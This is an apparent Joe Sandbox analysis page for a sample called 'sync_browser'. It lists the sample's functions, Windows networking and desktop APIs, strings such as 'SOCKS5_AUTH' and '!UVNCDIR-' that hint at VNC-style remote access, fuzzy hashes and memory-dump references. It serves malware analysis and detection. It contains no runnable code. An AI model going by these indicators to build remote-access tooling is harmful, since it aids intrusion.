Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: recv$send$_errno_invalid_parameter_noinfo_wgetenv
String ID: SOCKS5_AUTH
API String ID: 788663964-1698957378
Opcode ID: a52017378aba2792d1574ce981dd4d2621b7e1f64bedfacb3fbf5eec73a6fd49
Instruction ID: b4057d19792509be34bb78e900dc027091fe1cdcede3a23117e235f1333fa963
Opcode Fuzzy Hash: a52017378aba2792d1574ce981dd4d2621b7e1f64bedfacb3fbf5eec73a6fd49
Instruction Fuzzy Hash: FB81282373CA4241E7618729E5402BA6A9DEFA5794F442331FE5EC7AE9EE2CD40DC700

Function 00007FF67E7CCDC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 113networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FF67E7CCDF5

Part of subcall function 00007FF67E7CB550: inet_ntoa.WS2_32 ref: 00007FF67E7CB59C
Part of subcall function 00007FF67E7CB550: inet_ntoa.WS2_32 ref: 00007FF67E7CB5B8
Part of subcall function 00007FF67E7CB550: free.LIBCMT ref: 00007FF67E7CB5CC
Part of subcall function 00007FF67E7CB550: free.LIBCMT ref: 00007FF67E7CB5D4
Part of subcall function 00007FF67E7CB550: _wgetenv.LIBCMT ref: 00007FF67E7CB60D

Part of subcall function 00007FF67E7CB8C0: inet_addr.WS2_32 ref: 00007FF67E7CB9C2
Part of subcall function 00007FF67E7CB8C0: htons.WS2_32 ref: 00007FF67E7CB9FE
Part of subcall function 00007FF67E7CB8C0: socket.WS2_32 ref: 00007FF67E7CBA13
Part of subcall function 00007FF67E7CB8C0: connect.WS2_32 ref: 00007FF67E7CBA2A

inet_addr.WS2_32 ref: 00007FF67E7CCEA8
gethostbyname.WS2_32 ref: 00007FF67E7CCEB6
closesocket.WS2_32 ref: 00007FF67E7CCF0A
closesocket.WS2_32 ref: 00007FF67E7CCF18

Strings

0123456789., xrefs: 00007FF67E7CCE73

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: closesocketfreeinet_addrinet_ntoa$Startup_wgetenvconnectgethostbynamehtonssocket
String ID: 0123456789.
API String ID: 1515065793-2088042752
Opcode ID: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
Instruction ID: d30822b07d154cafe2626d24a109b4647453014779d896b98a649e519a4d4ba8
Opcode Fuzzy Hash: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
Instruction Fuzzy Hash: 62415563B246828AEB319F25D8443F96258AF69BA4F045335FE1D876E5EF2CD549C300

Function 00007FF67E7D77C0 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 88sleepCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 00007FF67E7D77E1
EnterCriticalSection.KERNEL32 ref: 00007FF67E7D77F5
Sleep.KERNEL32 ref: 00007FF67E7D78BA
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7D7950

Strings

keyEvent, xrefs: 00007FF67E7D7858
stop_event, xrefs: 00007FF67E7D787A
start_event, xrefs: 00007FF67E7D789D

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterInitializeLeaveSleep
String ID: keyEvent$start_event$stop_event
API String ID: 2894921085-1979648887
Opcode ID: 5e942cff42221011ccb8e3385eb1f8bb143b44ab75859811ab11e89d6bfbc5a3
Instruction ID: 1a172f37388e952e18dfcf1ee55cd2d93d20a9465ecd3c8e8fe1b08fb07aec11
Opcode Fuzzy Hash: 5e942cff42221011ccb8e3385eb1f8bb143b44ab75859811ab11e89d6bfbc5a3
Instruction Fuzzy Hash: CD41492BE39A4391FA20EB54E4547B6A390AFA5744F640036F94ECB7A2CF7DA44CC341

Function 00007FF67E816FF0 Relevance: 10.6, APIs: 7, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E8171D0: LoadLibraryA.KERNEL32 ref: 00007FF67E817212
Part of subcall function 00007FF67E8171D0: GetProcAddress.KERNEL32 ref: 00007FF67E81722F
Part of subcall function 00007FF67E8171D0: FreeLibrary.KERNEL32 ref: 00007FF67E81729D

EnumDisplaySettingsA.USER32 ref: 00007FF67E817042
EnumDisplaySettingsA.USER32 ref: 00007FF67E8170AA
EnumDisplaySettingsA.USER32 ref: 00007FF67E817112
GetSystemMetrics.USER32 ref: 00007FF67E81715A
GetSystemMetrics.USER32 ref: 00007FF67E81716B
GetSystemMetrics.USER32 ref: 00007FF67E81717C
GetSystemMetrics.USER32 ref: 00007FF67E81718D

Part of subcall function 00007FF67E8172F0: LoadLibraryA.KERNEL32 ref: 00007FF67E817335
Part of subcall function 00007FF67E8172F0: GetProcAddress.KERNEL32 ref: 00007FF67E817352
Part of subcall function 00007FF67E8172F0: FreeLibrary.KERNEL32 ref: 00007FF67E8173D9

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: LibraryMetricsSystem$DisplayEnumSettings$AddressFreeLoadProc
String ID:
API String ID: 3112530957-0
Opcode ID: 8e670c82803b1e3d87f37cd23dd2564999404595f46980b38d1fcce0b4863635
Instruction ID: 221bb846ede36b5da4b601807023621ef43e8a657a048ed13aa1c8859d594aec
Opcode Fuzzy Hash: 8e670c82803b1e3d87f37cd23dd2564999404595f46980b38d1fcce0b4863635
Instruction Fuzzy Hash: 744108729146C18AE324DF78E4447A9BBA0F749B18F044939EB699B748DF3DD948CF10

Function 00007FF67E7EBBF0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF67E7EBC2F
CloseHandle.KERNEL32 ref: 00007FF67E7EBCB3
DeleteFileA.KERNEL32 ref: 00007FF67E7EBD40
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7EBD4A

Strings

f, xrefs: 00007FF67E7EBC24
!UVNCDIR-, xrefs: 00007FF67E7EBD1A

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$CloseDeleteEnterFileHandleLeave
String ID: !UVNCDIR-$f
API String ID: 753559762-4271271459
Opcode ID: 29944916d6d12298b1d8fc6fc50fe8c47ba2ebb8248a2f4b8993eced494bf57f
Instruction ID: 6f5c99cb81015562881b8ded1e15f74038af744309834ff7aaa2ec8323c9a4c3
Opcode Fuzzy Hash: 29944916d6d12298b1d8fc6fc50fe8c47ba2ebb8248a2f4b8993eced494bf57f
Instruction Fuzzy Hash: 1E41B323A28B8181EB60DF24E8543B96790EB95BA4F040335EA6E8B7E5DF3CD048C710

Function 00007FF67E813740 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF67E877BF0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF67E813771), ref: 00007FF67E877BFE

GetLastError.KERNEL32 ref: 00007FF67E813790
SetLastError.KERNEL32 ref: 00007FF67E8137B2
FormatMessageA.KERNEL32 ref: 00007FF67E8137EB
sprintf.LIBCMT ref: 00007FF67E813804

Part of subcall function 00007FF67E87B240: _errno.LIBCMT ref: 00007FF67E87B258
Part of subcall function 00007FF67E87B240: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E87B263

Part of subcall function 00007FF67E813690: OutputDebugStringA.KERNEL32(?,?,?,?,?,00007FF67E81385F), ref: 00007FF67E8136A9
Part of subcall function 00007FF67E813690: GetStdHandle.KERNEL32(?,?,?,?,?,00007FF67E81385F), ref: 00007FF67E8136D1
Part of subcall function 00007FF67E813690: WriteConsoleA.KERNEL32 ref: 00007FF67E8136EE
Part of subcall function 00007FF67E813690: WriteFile.KERNEL32(?,?,?,?,?,00007FF67E81385F), ref: 00007FF67E813725

Strings

--, xrefs: 00007FF67E813819
error code 0x%08X, xrefs: 00007FF67E8137F5

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorFileLastTimeWrite$ConsoleDebugFormatHandleMessageOutputStringSystem_errno_invalid_parameter_noinfosprintf
String ID: --$error code 0x%08X
API String ID: 1897734068-3878996968
Opcode ID: efd08b52188bb8304a99cb4b7993a8a97ecc2afbd75597a5911adc055181aade
Instruction ID: 0e7e97db8bcf202e7294069c3c55ac50d257bdec61546ad2a190601e79071ff0
Opcode Fuzzy Hash: efd08b52188bb8304a99cb4b7993a8a97ecc2afbd75597a5911adc055181aade
Instruction Fuzzy Hash: C831B073B28A8181EB20DB65E4143AAA761FB95BA8F544335FB6D876D5DF3CE0098700

Function 00007FF67E7CACB0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E8792A4: malloc.LIBCMT ref: 00007FF67E8792C7

inet_addr.WS2_32 ref: 00007FF67E7CAD73
free.LIBCMT ref: 00007FF67E7CAD92

Strings

0123456789., xrefs: 00007FF67E7CAD45
both, xrefs: 00007FF67E7CACF7
local, xrefs: 00007FF67E7CAD2B
remote, xrefs: 00007FF67E7CAD11

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: freeinet_addrmalloc
String ID: 0123456789.$both$local$remote
API String ID: 2387382576-3366603569
Opcode ID: 693ffa12aebc96a0796163309a3b3ce82c055d970d3f392e798de053c61bca72
Instruction ID: a07353eeed0d06f1f6906b077e4a973d4f8a80161a348684f0bb8506eb9bc53f
Opcode Fuzzy Hash: 693ffa12aebc96a0796163309a3b3ce82c055d970d3f392e798de053c61bca72
Instruction Fuzzy Hash: 3221C923F2C68245F7109B11D9103786799FBA87D1F589631FA1E8B7E9EE2CD989C300

Function 00007FF67E87D58C Relevance: 10.6, APIs: 7, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF67E87D5AF
_errno.LIBCMT ref: 00007FF67E87D5B7

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: __doserrno_errno
String ID:
API String ID: 921712934-0
Opcode ID: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
Instruction ID: aeedce933f2b42894da2a75ea81ac49cb6539ceb90f6d1e4f750412bf44df4e8
Opcode Fuzzy Hash: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
Instruction Fuzzy Hash: 0721D423B3C64245F2156FE5D84137DA6516FA27A1F494135FA1C873D3CE7CA449CB60

Function 00007FF67E7CA040 Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA07A
GetCurrentThreadId.KERNEL32 ref: 00007FF67E7CA083
GetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA08B
SetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0A6
MessageBoxA.USER32 ref: 00007FF67E7CA0B7
SetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0C2
CloseDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0CB

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseCurrentInputMessageOpen
String ID:
API String ID: 1973726940-0
Opcode ID: 74b4376dc008a2e3deaa89793efa6c2b5ae9ae972eae381437ecec0259b7ff16
Instruction ID: bba0f877ae272662833bb10caa9263b4a2662150aa418fab125afc2a873e893b
Opcode Fuzzy Hash: 74b4376dc008a2e3deaa89793efa6c2b5ae9ae972eae381437ecec0259b7ff16
Instruction Fuzzy Hash: 6A117226F2DB5182EB149B56B844069A2A8BB5DFD5F044435FE4E83B64DE3CD489C700

Function 00007FF67E87EEF8 Relevance: 10.6, APIs: 7, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF67E87EF11
_errno.LIBCMT ref: 00007FF67E87EF19
_close_nolock.LIBCMT ref: 00007FF67E87EF70

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: __doserrno_close_nolock_errno
String ID:
API String ID: 186997739-0
Opcode ID: 0c6e4c21da35182ad9278105eade7e0fa1460cea4b5bf11609be99456b1b247b
Instruction ID: de0d7b663de543544ef2a951b349c51b678ec435b3b25a785aedbf568734d058
Opcode Fuzzy Hash: 0c6e4c21da35182ad9278105eade7e0fa1460cea4b5bf11609be99456b1b247b
Instruction Fuzzy Hash: 5211E123F3864245F2152FA5A88127CA651AFA17A1F59453AF52DC77D3CE7CA448C710

Function 00007FF67E7C3E60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56timewindowCOMMON

Download Yara Rule

APIs

SetBkMode.GDI32 ref: 00007FF67E7C3E9C
SetWindowPos.USER32 ref: 00007FF67E7C3ED5
KillTimer.USER32 ref: 00007FF67E7C3EF3
PostQuitMessage.USER32 ref: 00007FF67E7C3EFB
SetTimer.USER32 ref: 00007FF67E7C3F14

Strings

d, xrefs: 00007FF67E7C3EB3

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Timer$KillMessageModePostQuitWindow
String ID: d
API String ID: 3664928928-2564639436
Opcode ID: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
Instruction ID: b71f6bf3013ce55390ec934808e6e22e4d96d654e1b562e09dc319bab341832d
Opcode Fuzzy Hash: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
Instruction Fuzzy Hash: 341151A3F2860383F7605B39E8156756298AF64765F484330E92AC56E0EE3C9999CB00

Function 00007FF67E7DA6F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetWindowLongPtrA.USER32 ref: 00007FF67E7DA71A
SetWindowLongPtrA.USER32 ref: 00007FF67E7DA752
SetDlgItemTextA.USER32 ref: 00007FF67E7DA767
SetForegroundWindow.USER32 ref: 00007FF67E7DA770
EndDialog.USER32 ref: 00007FF67E7DA785

Strings

Oct 1 2014 21:43:49, xrefs: 00007FF67E7DA758

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Window$Long$DialogForegroundItemText
String ID: Oct 1 2014 21:43:49
API String ID: 2747855613-2751236551
Opcode ID: 9a61f633431cb37e218c1f842c908c6751c059a7ba695ef3b628182b3906ce08
Instruction ID: 0f19167d52fb31421efae08d0cdc8a9597e46c9725a65a9422d38c99523ce44c
Opcode Fuzzy Hash: 9a61f633431cb37e218c1f842c908c6751c059a7ba695ef3b628182b3906ce08
Instruction Fuzzy Hash: F1116036A28B4282E314CB2AE584579A3A5FB95BE0F244131FA8A47B94DF7CD449C740

Function 00007FF67E7CA390 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF67E7CA3A6

Part of subcall function 00007FF67E7CA200: GetProcAddress.KERNEL32 ref: 00007FF67E7CA225
Part of subcall function 00007FF67E7CA200: FreeLibrary.KERNEL32 ref: 00007FF67E7CA265

LoadLibraryA.KERNEL32 ref: 00007FF67E7CA3CB
